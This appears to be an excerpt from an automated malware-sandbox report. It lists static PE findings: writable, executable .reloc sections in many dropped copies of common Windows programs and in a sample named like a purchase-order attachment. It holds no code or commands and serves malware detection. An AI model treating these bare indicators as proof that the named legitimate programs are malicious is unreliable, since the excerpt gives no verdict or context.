Source: GoogleUpdate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: PO #09465610_GQ 003745_SO-242000846.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Grinnellia.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
